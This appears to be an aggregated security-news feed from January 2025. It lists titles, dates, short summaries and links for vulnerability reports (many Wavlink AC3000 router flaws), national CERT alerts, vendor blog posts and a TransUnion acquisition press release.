Mobile searchers will soon see a cleaner, more streamlined look for how URLs appear in search results. Initially introduced as part of the "site hierarchy" feature, we've found that the breadcrumb element isn't as useful to people who are searching on mobile devices, as it gets cut off on smaller screens. Starting today, we'll no longer show breadcrumbs on mobile search results in all languages and regions where Google Search is available (they continue to appear on desktop search results).

https://developers.google.com/search/blog/2025/01/simplifying-breadcrumbs
Security Alert: Microsoft Releases January 2025 Security Updates
2025-01-15T02:15:00Z | 1736907300

Security Alert: Microsoft Releases January 2025 Security Updates

https://www.jpcert.or.jp/english/at/2025/at250002.html
Observium vlan html code injection vulnerability
2025-01-15T00:00:00Z | 1736899200

https://talosintelligence.com/vulnerability_reports/TALOS-2024-2091
Observium mapname cross-site scripting (XSS) vulnerability
2025-01-15T00:00:00Z | 1736899200

https://talosintelligence.com/vulnerability_reports/TALOS-2024-2092
Observium add_alert_check cross-site scripting (XSS) vulnerability
2025-01-15T00:00:00Z | 1736899200

https://talosintelligence.com/vulnerability_reports/TALOS-2024-2090
Why Microsegmentation Alone Isn’t Enough by Lucie Cardiet
2025-01-15T00:00:00Z | 1736899200

Learn why microsegmentation alone can't fully secure your network and how combining it with advanced threat detection enhances your protection.

https://www.vectra.ai/blog/why-microsegmentation-alone-isnt-enough
Aktiv utnyttelse av Fortinet-sårbarhet CVE-2024-55591
2025-01-14T21:39:56Z | 1736890796

Fortinet har sluppet sikkerhetsoppdateringer til en kritisk sårbarhet i FortiOS versjon 7.0 og FortiProxy versjon 7.0 og 7.2.

https://nsm.no/fagomrader/digital-sikkerhet/nasjonalt-cybersikkerhetssenter/varsler-fra-ncsc/aktiv-utnyttelse-av-fortinet-sarbarhet-cve-2024-55591
Patchetirsdag januar 2025
2025-01-14T21:22:14Z | 1736889734

Microsoft vurderer 11 sårbarheter som kritiske i månedens sikkerhetsoppdatering. Flere av sårbarhetene kan utnyttes til å kjøre kode over internett og ta kontroll over brukere og systemer.

https://nsm.no/fagomrader/digital-sikkerhet/nasjonalt-cybersikkerhetssenter/varsler-fra-ncsc/patcetirsdag-januar-2025
Video teleconferencing (ITSAP.10.216)
2025-01-14T19:21:52Z | 1736882512

https://cyber.gc.ca/en/guidance/video-teleconferencing-itsap10216
Simplify Managed File Transfers with Data443: Success Story
2025-01-14T17:48:41Z | 1736876921

Data transfer, especially business-critical data transfer, is the lifeblood of any organization. But maintaining high availability for critical file transfers can be a big problem especially for companies operating in tough environments. That was the situation a leading financial services company found themselves in until they found the solution: Data443’s Data Placement Manager (DPM). The post Simplify Managed File Transfers with Data443: Success Story appeared first on Data443.

https://data443.com/simplify-managed-file-transfers-with-data443-success-story/
Six Friends Every Security Team Needs
2025-01-14T16:46:21Z | 1736873181

Around the year 1900, an author (Rudyard Kipling) wrote a poem called “The Elephant’s Child.” In it, he writes: “I keep six honest serving men They taught me all I knew Their names are What and Why and When And How and Where and Who.”  Little did Kipling know that these six friends would someday […]

https://mixmode.ai/blog/six-friends-every-security-team-needs/
2025 Top 5 Cybersecurity & Automation Trends
2025-01-14T13:41:45Z | 1736862105

With everything becoming AI-driven, IT infrastructures and digital resilience are evolving fast. So how will business and technology leaders steer their investment, innovation, and threat mitigation strategies in the forthcoming months? How will they make best use of critical services such as DDI (DNS-DHCP-IPAM) to make sure their IT initiatives succeed? As we go deeper… The post 2025 Top 5 Cybersecurity & Automation Trends appeared first on EfficientIP.

https://efficientip.com/blog/2025-top-5-cybersecurity-automation-trends/
Black Duck's BSIMM15 Report Highlights How Companies Are Tackling Security Risk in AI and Software Supply Chains
2025-01-14T13:00:00Z | 1736859600

Key BSIMM15 Highlights: The number of organizations conducting adversarial tests (abuse cases) has doubled year-over-year. The number of organizations performing software composition analysis...

https://news.blackduck.com/2025-01-14-Black-Ducks-BSIMM15-Report-Highlights-How-Companies-Are-Tackling-Security-Risk-in-AI-and-Software-Supply-Chains
Weekly review of the National Cyber Security Centre Finland (NCSC-FI) – 2/2025
2025-01-14T12:26:59Z | 1736857619

Last year, fewer cases of ransomware were detected than in the previous year, but the number of reports increased towards the end of the year. This week we also warn about scammers interested in cryptocurrencies.

https://www.kyberturvallisuuskeskus.fi/en/news/weekly-review-national-cyber-security-centre-finland-ncsc-fi-22025
Weekly review of the National Cyber Security Centre Finland (NCSC-FI) – 2/2025
2025-01-14T12:26:59Z | 1736857619

Last year, fewer cases of ransomware were detected than in the previous year, but the number of reports increased towards the end of the year. This week we also warn about scammers interested in cryptocurrencies.

https://www.kyberturvallisuuskeskus.fi/en/news/weekly-review-national-cyber-security-centre-finland-ncsc-fi-22025
CVE-2025-0430
2025-01-14T11:38:00Z | 1736854680

CWE-476 NULL POINTER DEREFERENCE: The affected product is vulnerable to a NULL Dereference vulnerability, which could allow a remote attacker to create a denial-of-service condition. Successful exploitation of this vulnerability could could result in a remote attacker causing a denial-of-service condition on the affected devices. Belledonne Communications recommends users implement the fix in Version 5.3.99 of the linphone-sdk.

https://claroty.com/team82/disclosure-dashboard/cve-2025-0430
New proposals to counter ransomware: Have your say
2025-01-14T10:30:01Z | 1736850601

Help shape the proposals aimed at striking a significant blow to the ransomware criminal business model in the UK.

https://www.ncsc.gov.uk/news/your-say-proposals-to-counter-ransomware
Protecting children online: Where Florida’s new law falls short
2025-01-14T10:00:00Z | 1736848800

Some of the state’s new child safety law can be easily circumvented. Should it have gone further?

https://www.welivesecurity.com/en/kids-online/protecting-children-online-where-floridas-new-law-falls-short/
Wavlink AC3000 adm.cgi rep_as_bridge() buffer overflow vulnerability
2025-01-14T00:00:00Z | 1736812800

https://talosintelligence.com/vulnerability_reports/TALOS-2024-2025
Wavlink AC3000 login.cgi set_sys_init() command injection vulnerabilities
2025-01-14T00:00:00Z | 1736812800

https://talosintelligence.com/vulnerability_reports/TALOS-2024-2018
Wavlink AC3000 adm.cgi set_wzdgw4G() buffer overflow vulnerability
2025-01-14T00:00:00Z | 1736812800

https://talosintelligence.com/vulnerability_reports/TALOS-2024-2026
Wavlink AC3000 adm.cgi set_sys_adm() buffer overflow vulnerability
2025-01-14T00:00:00Z | 1736812800

https://talosintelligence.com/vulnerability_reports/TALOS-2024-2030
Wavlink AC3000 fw_check.sh Firmware Upload vulnerability
2025-01-14T00:00:00Z | 1736812800

https://talosintelligence.com/vulnerability_reports/TALOS-2024-2037
Wavlink AC3000 update_filter_url.sh argument injection vulnerability
2025-01-14T00:00:00Z | 1736812800

https://talosintelligence.com/vulnerability_reports/TALOS-2024-2038
Wavlink AC3000 nas.cgi add_dir() command injection vulnerabilities
2025-01-14T00:00:00Z | 1736812800

https://talosintelligence.com/vulnerability_reports/TALOS-2024-2058
Wavlink AC3000 nas.cgi set_ftp_cfg() Configuration Control Vulnerabilities
2025-01-14T00:00:00Z | 1736812800

https://talosintelligence.com/vulnerability_reports/TALOS-2024-2056
Wavlink AC3000 wireless.cgi DeleteMac() buffer overflow vulnerability
2025-01-14T00:00:00Z | 1736812800

https://talosintelligence.com/vulnerability_reports/TALOS-2024-2040
Wavlink AC3000 touchlist_sync.cgi touchlistsync() command injection vulnerability
2025-01-14T00:00:00Z | 1736812800

https://talosintelligence.com/vulnerability_reports/TALOS-2024-2000
Wavlink AC3000 firewall.cgi iptablesWebsFilterRun() command injection vulnerability
2025-01-14T00:00:00Z | 1736812800

https://talosintelligence.com/vulnerability_reports/TALOS-2024-2023
Wavlink AC3000 openvpn.cgi openvpn_server_setup() Configuration Control Vulnerabilities
2025-01-14T00:00:00Z | 1736812800

https://talosintelligence.com/vulnerability_reports/TALOS-2024-2050
Wavlink AC3000 nas.cgi set_smb_cfg() Configuration Control Vulnerability
2025-01-14T00:00:00Z | 1736812800

https://talosintelligence.com/vulnerability_reports/TALOS-2024-2055
Wavlink AC3000 touchlist_sync.cgi touchlistsync() buffer overflow vulnerability
2025-01-14T00:00:00Z | 1736812800

https://talosintelligence.com/vulnerability_reports/TALOS-2024-2046
Wavlink AC3000 nas.cgi set_nas() proftpd Configuration Control Vulnerabilities
2025-01-14T00:00:00Z | 1736812800

https://talosintelligence.com/vulnerability_reports/TALOS-2024-2053
Wavlink AC3000 wireless.cgi SetName() buffer overflow vulnerability
2025-01-14T00:00:00Z | 1736812800

https://talosintelligence.com/vulnerability_reports/TALOS-2024-2039
Wavlink AC3000 wireless.cgi set_wifi_basic() buffer overflow vulnerability
2025-01-14T00:00:00Z | 1736812800

https://talosintelligence.com/vulnerability_reports/TALOS-2024-2041
Wavlink AC3000 openvpn.cgi openvpn_client_setup() Configuration Control Vulnerability
2025-01-14T00:00:00Z | 1736812800

https://talosintelligence.com/vulnerability_reports/TALOS-2024-2051
Wavlink AC3000 wireless.cgi AddMac() buffer overflow vulnerability
2025-01-14T00:00:00Z | 1736812800

https://talosintelligence.com/vulnerability_reports/TALOS-2024-2043
Wavlink AC3000 qos.cgi qos_sta_settings() buffer overflow vulnerability
2025-01-14T00:00:00Z | 1736812800

https://talosintelligence.com/vulnerability_reports/TALOS-2024-2048
Wavlink AC3000 wireless.cgi AddMac() command injection vulnerability
2025-01-14T00:00:00Z | 1736812800

https://talosintelligence.com/vulnerability_reports/TALOS-2024-2044
Wavlink AC3000 nas.cgi remove_dir() Command Injection Vulnerability
2025-01-14T00:00:00Z | 1736812800

https://talosintelligence.com/vulnerability_reports/TALOS-2024-2054
Wavlink AC3000 nas.cgi set_nas() samba Configuration Control Vulnerability
2025-01-14T00:00:00Z | 1736812800

https://talosintelligence.com/vulnerability_reports/TALOS-2024-2052
Wavlink AC3000 qos.cgi qos_sta() command injection vulnerability
2025-01-14T00:00:00Z | 1736812800

https://talosintelligence.com/vulnerability_reports/TALOS-2024-2047
Wavlink AC3000 usbip.cgi set_info() buffer overflow vulnerability
2025-01-14T00:00:00Z | 1736812800

https://talosintelligence.com/vulnerability_reports/TALOS-2024-2045
Wavlink AC3000 wireless.cgi set_wifi_basic_mesh() buffer overflow vulnerability
2025-01-14T00:00:00Z | 1736812800

https://talosintelligence.com/vulnerability_reports/TALOS-2024-2042
Wavlink AC3000 qos.cgi qos_settings() buffer overflow vulnerabilities
2025-01-14T00:00:00Z | 1736812800

https://talosintelligence.com/vulnerability_reports/TALOS-2024-2049
Wavlink AC3000 adm.cgi set_ledonoff() OS command injection vulnerability
2025-01-14T00:00:00Z | 1736812800

https://talosintelligence.com/vulnerability_reports/TALOS-2024-2032
Wavlink AC3000 login.cgi Unauthenticated Firmware Upload vulnerability
2025-01-14T00:00:00Z | 1736812800

https://talosintelligence.com/vulnerability_reports/TALOS-2024-2036
Wavlink AC3000 testsave.sh Information Disclosure vulnerability
2025-01-14T00:00:00Z | 1736812800

https://talosintelligence.com/vulnerability_reports/TALOS-2024-2035
Wavlink AC3000 adm.cgi set_MeshAp() arbitrary code execution vulnerability
2025-01-14T00:00:00Z | 1736812800

https://talosintelligence.com/vulnerability_reports/TALOS-2024-2031
Wavlink AC3000 touchlist_sync.cgi main() arbitrary code execution vulnerability
2025-01-14T00:00:00Z | 1736812800

https://talosintelligence.com/vulnerability_reports/TALOS-2024-1999
Wavlink AC3000 adm.cgi set_TR069() buffer overflow vulnerability
2025-01-14T00:00:00Z | 1736812800

https://talosintelligence.com/vulnerability_reports/TALOS-2024-2029
Wavlink AC3000 adm.cgi set_wzdap() buffer overflow vulnerability
2025-01-14T00:00:00Z | 1736812800

https://talosintelligence.com/vulnerability_reports/TALOS-2024-2027
Wavlink AC3000 internet.cgi set_add_routing() buffer overflow vulnerability
2025-01-14T00:00:00Z | 1736812800

https://talosintelligence.com/vulnerability_reports/TALOS-2024-2021
Wavlink AC3000 login.cgi Goto_chidx() buffer overflow vulnerability
2025-01-14T00:00:00Z | 1736812800

https://talosintelligence.com/vulnerability_reports/TALOS-2024-2019
Wavlink AC3000 login.cgi set_lang_CountryCode() Persistent XSS vulnerability
2025-01-14T00:00:00Z | 1736812800

https://talosintelligence.com/vulnerability_reports/TALOS-2024-2017
Wavlink AC3000 wctrls static login vulnerability
2025-01-14T00:00:00Z | 1736812800

https://talosintelligence.com/vulnerability_reports/TALOS-2024-2034
Wavlink AC3000 adm.cgi set_TR069() command injection vulnerability
2025-01-14T00:00:00Z | 1736812800

https://talosintelligence.com/vulnerability_reports/TALOS-2024-2028
Wavlink AC3000 adm.cgi rep_as_router() buffer overflow vulnerability
2025-01-14T00:00:00Z | 1736812800

https://talosintelligence.com/vulnerability_reports/TALOS-2024-2024
Wavlink AC3000 adm.cgi sch_reboot() OS command injection vulnerabilities
2025-01-14T00:00:00Z | 1736812800

https://talosintelligence.com/vulnerability_reports/TALOS-2024-2033
Wavlink AC3000 internet.cgi set_add_routing() command injection vulnerabilities
2025-01-14T00:00:00Z | 1736812800

https://talosintelligence.com/vulnerability_reports/TALOS-2024-2020
Wavlink AC3000 nas.cgi add_dir() Directory Traversal Vulnerabilities
2025-01-14T00:00:00Z | 1736812800

https://talosintelligence.com/vulnerability_reports/TALOS-2024-2057
Wavlink AC3000 internet.cgi set_qos() buffer overflow vulnerabilities
2025-01-14T00:00:00Z | 1736812800

https://talosintelligence.com/vulnerability_reports/TALOS-2024-2022
Joint guidance on secure by demand and priority considerations for operational technology owners and operators when selecting digital products
2025-01-13T15:10:11Z | 1736781011

https://cyber.gc.ca/en/news-events/joint-guidance-secure-demand-and-priority-considerations-operational-technology-owners-and-operators-when-selecting-digital-products
New advice helps organisations select secure operational technology products in face of rising cyber threat
2025-01-13T15:09:10Z | 1736780950

Guide aims to help operational technology (OT) owners and operators choose products and manufacturers that follow secure-by-design principles.

https://www.ncsc.gov.uk/news/help-selecting-secure-ot-products-face-cyber-threat
Uus infoteenus loob püsiva terviseprobleemiga lapse toetamisest tervikpildi
2025-01-13T13:16:41Z | 1736774201

Riigiportaalis eesti.ee on nüüd kättesaadav uus infoteenus „Terviseprobleemiga lapse toetamine“, mis on eelkõige abiks lapsevanematele, kelle laps vajab terviseseisundi tõttu püsivat tuge. Infoteenus on kasulik tööriist ka tervishoiutöötajatele, tugispetsialistidele ja ametnikele, kes last ja tema pere abistavad.

https://ria.ee/uudised/uus-infoteenus-loob-pusiva-terviseprobleemiga-lapse-toetamisest-tervikpildi
S-RM appoints Lester Lim as Cyber Director as part of APAC cyber security practice growth
2025-01-13T09:09:27Z | 1736759367

S-RM appoints Lester Lim as Cyber Director as part of APAC cyber security practice growth New senior hire, Lester Lim, appointed to drive growth of cyber practice in APAC London and Hong Kong, 13 January 2025 - Leading investigations and cyber security consultancy S-RM today announced the appointment of Lester Lim as Director, Cyber Security based in Hong Kong.

https://www.s-rminform.com/news/s-rm-appoints-lester-lim-as-cyber-director-as-part-of-apac-cyber-security-practice-grow
OFFIS DCMTK nowindow improper array index validation vulnerability
2025-01-13T00:00:00Z | 1736726400

https://talosintelligence.com/vulnerability_reports/TALOS-2024-2122
OFFIS DCMTK determineMinMax improper array index validation vulnerability
2025-01-13T00:00:00Z | 1736726400

https://talosintelligence.com/vulnerability_reports/TALOS-2024-2121
Emerging Phishing Attack on Cyber Space of Bangladesh
2025-01-12T11:16:02Z | 1736680562

TLP: CLEAR Distribution: Public Type of Threat: Phishing E-Mail Date: 12 January 2025 Executive Summary Recently, we have observed a surge in phishing attacks targeting various government organizations, law enforcement agencies, educational institutions, and others, with the attacks spreading further through compromised accounts. This campaign is targeted to steal sensitive information by impersonating official entities and leveraging malicious attachments and links. This advisory provides details... Read More

https://www.cirt.gov.bd/phishing-awareness-bd-jan25/
Exploitation Walkthrough and Techniques - Ivanti Connect Secure RCE (CVE-2025-0282)
2025-01-12T08:45:32Z | 1736671532

As we saw in our previous blogpost, we fully analyzed Ivanti’s most recent unauthenticated Remote Code Execution vulnerability in their Connect Secure (VPN) appliance. Specifically, we analyzed CVE-2025-0282.Today, we’re going to walk through exploitation. Once again, however, stopping short of providing the world with a

https://labs.watchtowr.com/exploitation-walkthrough-and-techniques-ivanti-connect-secure-rce-cve-2025-0282/
Is Your Software Factory Missing RASP?
2025-01-10T20:44:14Z | 1736541854

Across the Department of Defense, software factories have become the mechanism for software modernization. From the AirForce’s Platform 1 to the Navy’s Overmatch Software Armory, software factories use DevSecOps principles to continuously and rapidly deliver secure next-gen systems and capabilities. But as development speeds increase, securing software at the same pace becomes a challenge. Security […] The post Is Your Software Factory Missing RASP? appeared first on RunSafe Security.

https://runsafesecurity.com/blog/software-factory-rasp-dod/
EDR Killers: After All, EDRs Are Not Invincible
2025-01-10T14:20:33Z | 1736518833

Fast Facts: EDR Killers are a growing cybersecurity threat, gaining prominence in 2024 and 2025. Widely deployed by ransomware groups, including RansomHub, Black Basta, and Embargo, to impair Endpoint Detection and Response (EDR). Prominent examples include EDRKillShifter, Terminator, AuKill, and MS4Killer. Readily available on underground markets, PoCs, and open-source platforms. By Bibek Thapa Magar and [...] The post EDR Killers: After All, EDRs Are Not Invincible appeared first on Logpoint.

https://www.logpoint.com/en/blog/emerging-threats/edr-killers-after-all-edrs-are-not-invincible/
Do Secure-By-Design Pledges Come With Stickers? - Ivanti Connect Secure RCE (CVE-2025-0282)
2025-01-10T01:30:07Z | 1736472607

Did you have a good break? Have you had a chance to breathe? Wake up.It’s 2025, and the chaos continues.Haha, see what we did? We wrote the exact same thing in 2024 because 2024 was exactly the same.As an industry, we are on GroundHog day

https://labs.watchtowr.com/do-secure-by-design-pledges-come-with-stickers-ivanti-connect-secure-rce-cve-2025-0282/
Email Archiving and Discovery for Legal and Privacy Requests
2025-01-09T20:50:04Z | 1736455804

Government agencies and organizations must handle a growing volume of legal and privacy-related requests such as FOIA. Many are using email archiving solutions to meet these needs but outdated technology can introduce significant bottlenecks and prevent them from responding quickly and accurately. The post Email Archiving and Discovery for Legal and Privacy Requests appeared first on Data443.

https://data443.com/email-archiving-and-discovery-for-legal-and-privacy-requests/
Aryaka Announces New Chief Customer Officer, VP of Security Product Management, and Launch of Aryaka Threat Research Lab
2025-01-09T12:58:27Z | 1736427507

SANTA CLARA, CA – January 9, 2025 – Aryaka®, the leader in Unified SASE as a Service, today announced new personnel and program investments in its commitment to delivering performance, agility, simplicity and security across customers’ global networks. The company has promoted Vidyaranya Maddi to Chief Customer Officer and hired Scott Fanning, formerly of Palo... The post Aryaka Announces New Chief Customer Officer, VP of Security Product Management, and Launch of Aryaka Threat Research Lab appeared first on Aryaka.

https://www.aryaka.com/press/aryaka-new-leadership-aryaka-threat-research-lab/
Crypto is soaring, but so are threats: Here’s how to keep your wallet safe
2025-01-09T10:00:00Z | 1736416800

As detections of cryptostealers surge across Windows, Android and macOS, it's time for a refresher on how to keep your bitcoin or other crypto safe

https://www.welivesecurity.com/en/cybersecurity/crypto-soaring-threats-how-keep-wallet-safe/
S-RM enhances Disputes & Investigations practice with appointment of Ana Pereu as Associate Director
2025-01-09T09:49:13Z | 1736416153

S-RM enhances Disputes & Investigations practice with appointment of Ana Pereu as Associate Director Pereu brings experience in complex investigations, from internal fraud cases to analysis of open-source and digital intelligence

https://www.s-rminform.com/news/s-rm-enhances-disputes-investigations-practice-with-appointment-of-ana-pereu-as-associate-director
Aastalõpp Eesti küberruumis: petturid olid jõulukuul erakordselt aktiivsed
2025-01-09T08:51:59Z | 1736412719

Riigi Infosüsteemi Ameti (RIA) kuuülevaatest selgub, et 2024. aasta detsembris avastati 735 õngitsus- ja petulehte, mida on ligi kaks korda rohkem kui eelnevatel kuudel.

https://ria.ee/uudised/aastalopp-eesti-kuberruumis-petturid-olid-joulukuul-erakordselt-aktiivsed
High Threat Security Alert (A25-01-04): Multiple Vulnerabilities in Ivanti Products
2025-01-09T04:00:00Z | 1736395200

Ivanti has released a security advisory to address multiple vulnerabilities in Ivanti products.

https://www.govcert.gov.hk/en/alerts_detail.php
High Threat Security Alert (A25-01-05): Multiple Vulnerabilities in SonicWall Products
2025-01-09T04:00:00Z | 1736395200

SonicWall released security advisories to address multiple vulnerabilities in SonicWall systems.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A25-01-06): Multiple Vulnerabilities in Juniper Networks Products
2025-01-09T04:00:00Z | 1736395200

Juniper Networks has published security advisories to address multiple vulnerabilities in Junos OS, Junos OS Evolved and Junos Space.

https://www.govcert.gov.hk/en/alerts_detail.php
Chinese State-Sponsored RedDelta Targeted Taiwan, Mongolia, and Southeast Asia with Adapted PlugX Infection Chain
2025-01-09T00:00:00Z | 1736380800

Between July 2023 and December 2024, RedDelta, a Chinese state-sponsored group, targeted Mongolia, Taiwan, and Southeast Asia using advanced spearphishing campaigns with evolving infection chains and the PlugX backdoor.

https://www.recordedfuture.com/research/reddelta-chinese-state-sponsored-group-targets-mongolia-taiwan-southeast-asia
Detonating Beacons to Illuminate Detection Gaps
2025-01-09T00:00:00Z | 1736380800

Learn how Elastic Security leveraged open-source BOFs to achieve detection engineering goals during our most recent ON week.

https://www.elastic.co/security-labs/detonating-beacons-to-illuminate-detection-gaps
A Newly Discovered Zero-Day Exposes NTLM Credentials to Theft by Lucie Cardiet
2025-01-09T00:00:00Z | 1736380800

Learn how attackers exploit the NTLM zero-day vulnerability and how Vectra AI can protect your organization from credential theft.

https://www.vectra.ai/blog/a-newly-discovered-zero-day-exposes-ntlm-credentials-to-theft
Securing Space as the Next Frontier of Critical Infrastructure
2025-01-08T19:09:46Z | 1736363386

As space becomes a key sector in critical infrastructure, protecting it against cyber threats is essential to sustaining global stability and economic growth. Space systems support vital industries—transportation, communications, and energy—and their role in national security makes them an attractive target for adversaries. To ensure the safety of these systems, we need robust cybersecurity measures […] The post Securing Space as the Next Frontier of Critical Infrastructure appeared first on RunSafe Security.

https://runsafesecurity.com/blog/space-security-critical-infrastructure/
Threat Research Recap: Paving the Way for Smarter Defense Tech in 2025
2025-01-08T16:39:18Z | 1736354358

Looking back at 2024, we recognize the immense value in revisiting some of our most impactful threat research. These articles not only offered real-time insights into pressing cybersecurity issues but also set the stage for advancements in AI-powered threat detection and defense.

https://mixmode.ai/blog/threat-research-recap-paving-the-way-for-smarter-defense-tech-in-2025/
Data Security: Challenges, Solutions, and the Path Forward
2025-01-08T15:00:00Z | 1736348400

Learn why a more proactive, integrated, and dynamic approach to data security is crucial to effectively safeguard your business in today?s digital landscape.

https://www.akamai.com/blog/security/2025/jan/data-security-challenges-solutions-and-the-path-forward
Top 10 web hacking techniques of 2024: nominations open
2025-01-08T14:07:27Z | 1736345247

Nominations are now open for the top 10 new web hacking techniques of 2024! Every year, security researchers from all over the world share their latest findings via blog posts, presentations, PoCs, an

https://portswigger.net/research/top-10-web-hacking-techniques-of-2024-nominations-open
Cyber Weather November 2024
2025-01-08T12:19:58Z | 1736338798

November proved the importance of preparedness as Finland faced two very different anomalies in our digitally-enabled society. The greyest month of the year was also tinged with scams and phishing campaigns in the name of banks. November also meant significant progress in ensuring cyber security in the EU.

https://www.kyberturvallisuuskeskus.fi/en/ajankohtaista/kybersaa_11/2024
Cyber Weather November 2024
2025-01-08T12:19:58Z | 1736338798

November proved the importance of preparedness as Finland faced two very different anomalies in our digitally-enabled society. The greyest month of the year was also tinged with scams and phishing campaigns in the name of banks. November also meant significant progress in ensuring cyber security in the EU.

https://www.kyberturvallisuuskeskus.fi/en/ajankohtaista/kybersaa_11/2024
TransUnion Announces Agreement to Acquire Financial Technology Company Monevo, a Credit Prequalification and Distribution Platform
2025-01-08T11:06:07Z | 1736334367

TransUnion has signed a definitive agreement to acquire U.K.-based Monevo, a credit prequalification and distribution platform that empowers lenders and banks to deliver highly personalised credit offers to consumers via comparison websites and other third parties. TransUnion currently owns 30% of the equity of Monevo after acquiring a minority stake in 2021 and has agreed to acquire the remaining ownership position from Quint Group Limited.“We are committed to making trust possible in global commerce by ensuring consumers and organizations can transact with confidence,” said Todd Skinner, President, International, TransUnion. “Prequalification, or eligibility, is an integral part of the consumer lending process. It drives financial inclusion and responsible lending by helping consumers find more suitable products in less time.”Monevo enables comparison websites and other online brands known as publishers to embed highly personalised credit offers, predominately in the U.K. and U.S. markets. Working with over 150 banks and credit providers globally, it provides centralised technology and decisioning infrastructure which integrates lenders and publishers, allowing them to deliver better outcomes for consumers searching for credit online. Those consumers are able to see the likelihood of being approved for credit products before applying with lenders, saving time and removing unnecessary searches which potentially adversely impact their credit scores.“I founded Monevo to improve access to credit for consumers through technology, and today it is powering credit distribution for some of the world's largest banks and lenders,” said Greg Cox, CEO of Quint Group and Monevo. “This acquisition is the natural next step in Monevo's future growth and success, and would unlock new opportunities to innovate by uniting these two complementary businesses, whose values are already strongly aligned.”Consumers, publishers and lenders all benefit from improved experiences and economics by using Monevo’s platform. Consumers experience a more compelling and personalised online credit shopping experience, receiving highly-tailored offers without impacting their credit score. Publishers gain the tools to win lender trust and delight consumers with more personalised engagement and successfully matched offers, leading to higher conversion rates. Lenders can minimise adverse selection and optimise acquisition costs while delivering an improved consumer experience for their brand.“Over the last three years, our partnership with Monevo has helped address gaps in the consumer experience. Together, we plan to deliver high-quality offers at scale with minimal support needed from our partners,” said Steve Chaouki, President, U.S. Markets, TransUnion. “Additionally, we continue to make good progress on broadening our value proposition and go-to-market strategy in the direct-to-consumer business in the U.S and expect to have more to share in the coming quarters.”The terms of the transaction are not being disclosed. The transaction is expected to be funded with existing cash-on-hand and not to have a material impact on leverage, liquidity or TransUnion’s 2025 operating results. The transaction is expected to close by Q2 2025, subject to the satisfaction of customary closing conditions and regulatory approvals. Further information:About TransUnion (NYSE: TRU)TransUnion is a global information and insights company with over 13,000 associates operating in more than 30 countries, including the United Kingdom. We make trust possible by ensuring each person is reliably represented in the marketplace. We do this by providing an actionable view of consumers, stewarded with care.Through our acquisitions and technology investments we have developed innovative solutions that extend beyond our strong foundation in core credit into areas such as marketing, fraud, risk and advanced analytics. As a result, consumers and businesses can transact with confidence and achieve great things. We call this Information for Good® — and it leads to economic opportunity, great experiences and personal empowerment for millions of people around the world.For more information, visit www.transunion.co.uk  About MonevoMonevo is a multi-award-winning credit technology business, focused on improving access to credit. Monevo’s next generation platform and API empowers over 150 lenders and banks globally to seamlessly distribute & embed highly personalised credit offers through third party comparison websites and apps. Until completion of the acquisition announced today, Monevo is part of Quint Group. Monevo is headquartered in the UK and currently operates in the UK, US and Australia.TransUnion Forward-Looking StatementsThis press release contains forward-looking statements within the meaning of the Private Securities Litigation Reform Act of 1995. These statements are based on the current beliefs and expectations of TransUnion’s management and are subject to significant risks and uncertainties. Actual results may differ materially from those described in the forward-looking statements. Any statements made in this press release that are not statements of historical fact, including statements about our beliefs and expectations, are forward-looking statements. Forward-looking statements include information concerning possible or assumed future results of operations, including our guidance and descriptions of our business plans and strategies. These statements often include words such as “anticipate,” “expect,” “guidance,” “suggest,” “plan,” “believe,” “intend,” “estimate,” “target,” “project,” “should,” “could,” “would,” “may,” “will,” “forecast,” “outlook,” “potential,” “continues,” “seeks,” “predicts,” or the negatives of these words and other similar expressions.Factors that could cause actual results to differ materially from those described in the forward-looking statements include: failure to realise the synergies and other benefits expected from the proposed acquisition of Monevo; the risk that required regulatory approvals are not obtained or are obtained subject to conditions that are not anticipated; the failure of any of the closing conditions in the definitive purchase agreement to be satisfied on a timely basis or at all; delay in closing the proposed acquisition; the possibility that the proposed acquisition, including the integration of Monevo, may be more costly to complete than anticipated; business disruption during the pendency of the proposed acquisition and following the acquisition closing; risks related to disruption of management time from ongoing business operations and other opportunities due to the proposed acquisition; the effects of pending and future legislation and regulatory actions and reforms; macroeconomic and industry trends and adverse developments in the debt, consumer credit and financial services markets and other macroeconomic factors beyond TransUnion’s control; risks related to TransUnion’s indebtedness, including our ability to make timely payments of principal and interest and our ability to satisfy covenants in the agreements governing our indebtedness; and other one-time events and other factors that can be found in our Annual Report on Form 10-K for the year ended December 31, 2023, and any subsequent Quarterly Report on Form 10-Q or Current Report on Form 8-K, which are filed with the Securities and Exchange Commission and are available on TransUnion’s website (www.transunion.com/tru) and on the Securities and Exchange Commission’s website (www.sec.gov). Many of these factors are beyond our control. The forward-looking statements contained in this press release speak only as of the date of this press release. We undertake no obligation to publicly release the result of any revisions to these forward-looking statements to reflect the impact of events or circumstances that may arise after the date of this press release.

https://newsroom.transunion.co.uk/transunion-announces-agreement-to-acquire-financial-technology-company-monevo-a-credit-prequalification-and-distribution-platform/
Backdooring Your Backdoors - Another $20 Domain, More Governments
2025-01-08T11:00:37Z | 1736334037

After the excitement of our .MOBI research, we were left twiddling our thumbs. As you may recall, in 2024, we demonstrated the impact of an unregistered domain when we subverted the TLS/SSL CA process for verifying domain ownership to give ourselves the ability to issue valid and trusted TLS/

https://labs.watchtowr.com/more-governments-backdoors-in-your-backdoors/
Under Siege: Ransomware and Healthcare
2025-01-08T09:26:57Z | 1736328417

It’s becoming all too common these days: ransomware hitting another organization. However, most people don’t know exactly what happens when ransomware is found and what must be addressed. What makes it even more challenging for healthcare is that the data that can be stolen, like personal health information, is much more valuable than credit card... The post Under Siege: Ransomware and Healthcare  appeared first on Cato Networks.

https://www.catonetworks.com/blog/under-siege-ransomware-and-healthcare/
Weekly review of the National Cyber Security Centre Finland (NCSC-FI) – 49/2024
2025-01-08T08:34:04Z | 1736325244

The topics this week include the widely reported cable break at the start of the week and the safe use of QR codes.

https://www.kyberturvallisuuskeskus.fi/en/news/weekly-review-national-cyber-security-centre-finland-ncsc-fi-492024
Weekly review of the National Cyber Security Centre Finland (NCSC-FI) – 49/2024
2025-01-08T08:34:04Z | 1736325244

The topics this week include the widely reported cable break at the start of the week and the safe use of QR codes.

https://www.kyberturvallisuuskeskus.fi/en/news/weekly-review-national-cyber-security-centre-finland-ncsc-fi-492024
Security Alert (A25-01-02): Vulnerability in Google Chrome
2025-01-08T04:00:00Z | 1736308800

Google released a security update to address vulnerability in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A25-01-03): Multiple Vulnerabilities in Firefox
2025-01-08T04:00:00Z | 1736308800

